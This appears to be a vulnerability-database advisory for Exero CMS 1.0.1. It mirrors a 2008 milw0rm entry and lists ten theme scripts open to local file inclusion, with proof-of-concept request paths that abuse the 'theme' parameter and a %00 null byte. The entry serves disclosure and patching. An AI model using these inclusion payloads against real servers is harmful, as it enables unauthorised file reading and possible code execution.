Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities

vendor:

Exero CMS

by:

milw0rm.com

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Exero CMS

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:exero_cms:exero_cms:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities

Exero CMS 1.0.1 is vulnerable to multiple local file inclusion vulnerabilities. An attacker can exploit these vulnerabilities to include arbitrary local files on the server, which can lead to remote code execution. The vulnerable scripts are: /Exero_CMS_1-0-1/themes/Default/usercp/index.php, /Exero_CMS_1-0-1/themes/Default/usercp/editpassword.php, /Exero_CMS_1-0-1/themes/Default/usercp/avatar.php, /Exero_CMS_1-0-1/themes/Default/custompage.php, /Exero_CMS_1-0-1/themes/Default/errors/404.php, /Exero_CMS_1-0-1/themes/Default/members/memberslist.php, /Exero_CMS_1-0-1/themes/Default/members/profile.php, /Exero_CMS_1-0-1/themes/Default/news/index.php, /Exero_CMS_1-0-1/themes/Default/news/fullview.php, /Exero_CMS_1-0-1/themes/Default/nopermission.php.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of Exero CMS.

Source

Exploit-DB raw data:

Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities
Script : http://switch.dl.sourceforge.net/sourceforge/exerocms/Exero_CMS_1-0-1.rar
Home Page : http://ecms.getox.net/
POC :

      /Exero_CMS_1-0-1/themes/Default/usercp/index.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/usercp/editpassword.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/usercp/avatar.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/custompage.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/errors/404.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/members/memberslist.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/members/profile.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/news/index.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/news/fullview.php?theme=Local File %00
      /Exero_CMS_1-0-1/themes/Default/nopermission.php?theme=Local File %00

# milw0rm.com [2008-03-17]